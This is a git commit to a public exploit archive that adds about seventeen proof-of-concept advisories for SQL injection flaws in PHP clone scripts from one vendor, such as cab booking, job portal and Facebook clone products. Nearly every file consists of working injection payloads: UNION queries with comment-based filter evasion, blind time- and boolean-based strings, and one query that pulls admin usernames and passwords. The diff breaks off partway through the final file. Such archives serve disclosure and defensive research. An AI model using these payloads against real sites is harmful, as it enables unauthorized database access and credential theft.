DB: 2017-12-11

18 changes to exploits/shellcodes Nearbuy Clone Script 3.2 - 'search' SQL Injection Cab Booking Script 1.0 - 'city' SQL Injection Chartered Accountant Booking Script 1.0 - 'city' SQL Injection Child Care Script 1.0 - 'city' SQL Injection CMS Auditor Website 1.0 - SQL Injection Co-work Space Search Script 1.0 - 'city' SQL Injection Yoga Class Script 1.0 - 'list?city' SQL Injection Consumer Complaints Clone Script 1.0 - 'id' SQL Injection Entrepreneur Job Portal Script 2.0.6 - 'jobsearch_all.php?rid1' SQL Injection Doctor Search Script 1.0 - 'city' SQL Injection Food Order Script 1.0 - 'list?city' SQL Injection E-commerce MLM Software 1.0 - SQL Injection Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection Event Calendar Category Script 1.0 - 'city' SQL Injection Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection Kickstarter Clone Acript 2.0 - 'projid' SQL Injection
2017-12-11 05:02:14 +00:00 · 2017-12-11 05:02:14 +00:00 · e37fd2bae3
commit e37fd2bae3
parent 97b5f8cc5b
19 changed files with 585 additions and 0 deletions
--- a/exploits/php/webapps/43268.txt
+++ b/exploits/php/webapps/43268.txt
@ -0,0 +1,34 @@
+# # # # # 
+# Exploit Title: Nearbuy Clone Script 3.2 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/nearbuy-clone/
+# Demo: http://www.fxwebsolution.com/demo/arthi/nearby/
+# Version: 3.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/category_list.php?search=[SQL]
+# 
+# Parameter: search (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: search=s%' AND 2775=2775 AND '%'='
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: search=s%' AND SLEEP(5) AND '%'='
+# 
+# # # # #
--- a/exploits/php/webapps/43269.txt
+++ b/exploits/php/webapps/43269.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Cab Booking Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/cab-booking-script-2/
+# Demo: http://fxwebsolution.com/demo/cab_booking/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/service-list?city=[SQL]&main_search=
+# 
+# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43270.txt
+++ b/exploits/php/webapps/43270.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Chartered Accountant Booking Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/chartered-accountant-booking-script/
+# Demo: http://fxwebsolution.com/demo/chartered-accountant/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/service-list?city=[SQL]&main_search=
+# 
+# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43271.txt
+++ b/exploits/php/webapps/43271.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Child Care Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/child-care-script/
+# Demo: http://ordermanagementscript.com/demo/childcare/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/list?city=[SQL]&main_search=
+# 
+# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43272.txt
+++ b/exploits/php/webapps/43272.txt
@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: CMS Auditor Website 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/
+# Demo: http://74.124.215.220/~projclient/client/auditor/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/news-detail/47[SQL]
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43273.txt
+++ b/exploits/php/webapps/43273.txt
@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Co-work Space Search Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/co-work-space-search-script/
+# Demo: http://ordermanagementscript.com/demo/co-work-space/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/list?city=[SQL]&main_search=
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43274.txt
+++ b/exploits/php/webapps/43274.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Consumer Complaints Clone Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/consumer-complaints-clone-script/
+# Demo: http://fxwebsolution.com/demo/consumer-complaints/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/other-user-profile.php?id=[SQL]
+# 
+# -1'++/*!50000UNION*/(SELECT(1),/*!11111CONCAT_WS*/(0x203a20,USER(),VERSION()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+-
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43275.txt
+++ b/exploits/php/webapps/43275.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Entrepreneur Job Portal Script 2.0.6 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/
+# Demo: http://freelancewebdesignerchennai.com/demo/job-portal/
+# Version: 2.0.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/jobsearch_all.php?rid1=[SQL]
+# 
+# -1'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+-
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43276.txt
+++ b/exploits/php/webapps/43276.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Doctor Search Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/
+# Demo: http://fxwebsolution.com/demo/doctorsearch/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/list?city=[SQL]&main_search=
+# 
+# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43277.txt
+++ b/exploits/php/webapps/43277.txt
@ -0,0 +1,40 @@
+# # # # # 
+# Exploit Title: E-commerce MLM Software 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/e-commerce-mlm/
+# Demo: http://74.124.215.220/~advaemlm/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/service_detail.php?pid=[SQL]
+# 
+# -6'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--+-
+# 
+# 
+# 2)
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+# 
+# -18'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7--+-
+# 
+# 
+# 3)
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# 
+# -27'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),3,4,5,6--+-
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43279.txt
+++ b/exploits/php/webapps/43279.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Event Search Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/event-search-script/
+# Demo: http://ordermanagementscript.com/demo/eventsearch/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/event-list?city=[SQL]&main_search=
+# 
+# -176'+UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+-
+# 
+# 
+# # # # #
--- a/exploits/php/webapps/43280.txt
+++ b/exploits/php/webapps/43280.txt
@ -0,0 +1,32 @@
+# # # # # 
+# Exploit Title: Facebook Clone Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/facebook-clone/
+# Demo: http://smsemailmarketing.in/demo/fbclone/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/friend-profile.php?id=[SQL
+# 
+# -1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+-
+# 
+# http://server/friend-profile.php?id=-1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+-
+# 
+# 2)
+# http://localhost/[PATH]/process.php?send=[SQL
+#  
+# # # # #
--- a/exploits/php/webapps/43281.txt
+++ b/exploits/php/webapps/43281.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Food Order Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/food-order-script-2/
+# Demo: http://ordermanagementscript.com/demo/food-order/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/list?city=[SQL]&main_search=
+# 
+# '++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+-
+# 
+# http://server/list?city='++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+-&main_search=
+# 
+# # # # #
--- a/exploits/php/webapps/43282.txt
+++ b/exploits/php/webapps/43282.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Yoga Class Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/yoga-class-script/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/list?city=[SQL]&main_search=
+# 
+# -'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
+# 
+# http://server/list?city=-'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
+# 
+# # # # #
--- a/exploits/php/webapps/43283.txt
+++ b/exploits/php/webapps/43283.txt
@ -0,0 +1,55 @@
+# # # # # 
+# Exploit Title: Freelance Website Script 2.0.6 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/freelance-website-script/
+# Version: 2.0.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/jobdetails.php?pr_id=[SQL]
+# 
+# -1'++UNION(SELECT(1),(2),(3),(4),(5),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93),(94),(95),(96),(97),(98),(99),(100))--+-
+# 
+# http://server/jobdetails.php?pr_id=-1'++UNION(SELECT(1),(2),(3),(4),(5),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93),(94),(95),(96),(97),(98),(99),(100))--+-
+# 
+# 
+# Parameter: pr_id (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: pr_id=51' AND 7083=7083 AND 'cZLs'='cZLs
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: pr_id=51' AND SLEEP(5) AND 'UHvA'='UHvA
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 83 columns
+#     Payload: pr_id=51' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707671,0x7755764a6b7a5561565652766766574a78435a486b457569645768756b456950765a706e4a6d7445,0x7162766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GImX
+# 
+# 
+# 2)
+# http://localhost/[PATH]/searchbycat_list.php?catid=[SQL]
+# 
+# -15++UNION(SELECT(1),(2),(3),(4),(5),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88))--+-
+# 
+# http://server/searchbycat_list.php?catid=-15++UNION(SELECT(1),(2),(3),(4),(5),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88))--+-
+# 
+# Parameter: catid (GET)
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: catid=15 AND SLEEP(5)-- nGws
+# 
+# # # # #
--- a/exploits/php/webapps/43284.txt
+++ b/exploits/php/webapps/43284.txt
@ -0,0 +1,35 @@
+# # # # # 
+# Exploit Title: Hot Scripts Clone 3.1 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
+# Version: 3.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/categories?subctid=[SQL]
+# 
+# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
+# 
+# http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
+# 
+# 2)
+# http://localhost/[PATH]/categories?&mctid=[SQL]
+# 
+# -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
+# 
+# http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43285.txt
+++ b/exploits/php/webapps/43285.txt
@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: Foodspotting Clone Script 1.0 - 'q' SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/foodspotting-clone/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/quicksearch.php?q=[SQL]
+# 
+# -1'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+-
+# 
+# -1'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(a_id,0x3a,username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+admin_login),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+-
+# 
+# http://server/quicksearch.php?q=-1'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+-
+# 
+# Parameter: q (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: q=1%' AND 5971=5971 AND '%'='
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: q=1%' AND SLEEP(5) AND '%'='
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 31 columns
